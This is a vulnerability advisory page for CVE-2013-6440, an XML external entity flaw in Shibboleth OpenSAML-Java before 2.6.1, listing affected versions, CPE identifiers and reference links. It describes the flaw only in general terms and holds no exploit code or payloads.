Moderate severityNVD Advisory· Published Feb 14, 2014· Updated Apr 29, 2026
CVE-2013-6440
CVE-2013-6440
Description
The (1) BasicParserPool, (2) StaticBasicParserPool, (3) XML Decrypter, and (4) SAML Decrypter in Shibboleth OpenSAML-Java before 2.6.1 set the expandEntityReferences property to true, which allows remote attackers to conduct XML external entity (XXE) attacks via a crafted XML DOCTYPE declaration.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.opensaml:opensamlMaven | < 2.6.1 | 2.6.1 |
Affected products
12cpe:2.3:a:internet2:opensaml:2.0:*:*:*:*:*:*:*+ 11 more
- cpe:2.3:a:internet2:opensaml:2.0:*:*:*:*:*:*:*
- cpe:2.3:a:internet2:opensaml:2.1.0:*:*:*:*:*:*:*
- cpe:2.3:a:internet2:opensaml:2.2.0:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:*:*:*:*:*:*:*:*range: <=2.6.0
- cpe:2.3:a:shibboleth:opensaml:2.4.0:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:2.4.1:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:2.4.2:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:2.4.3:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:2.5.0:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:2.5.1:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:2.5.2:*:*:*:*:*:*:*
- cpe:2.3:a:shibboleth:opensaml:2.5.3:*:*:*:*:*:*:*
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
10- github.com/advisories/GHSA-v723-58jv-2qc4ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2013-6440ghsaADVISORY
- blog.sendsafely.com/post/69590974866/web-based-single-sign-on-and-the-dangers-of-saml-xmlnvdWEB
- rhn.redhat.com/errata/RHSA-2014-0170.htmlnvdWEB
- rhn.redhat.com/errata/RHSA-2014-0171.htmlnvdWEB
- rhn.redhat.com/errata/RHSA-2014-0172.htmlnvdWEB
- rhn.redhat.com/errata/RHSA-2014-0195.htmlnvdWEB
- shibboleth.net/community/advisories/secadv_20131213.txtnvdWEB
- bugzilla.redhat.com/show_bug.cginvdWEB
- www.oracle.com/security-alerts/cpujan2022.htmlnvdWEB
News mentions
0No linked articles in our index yet.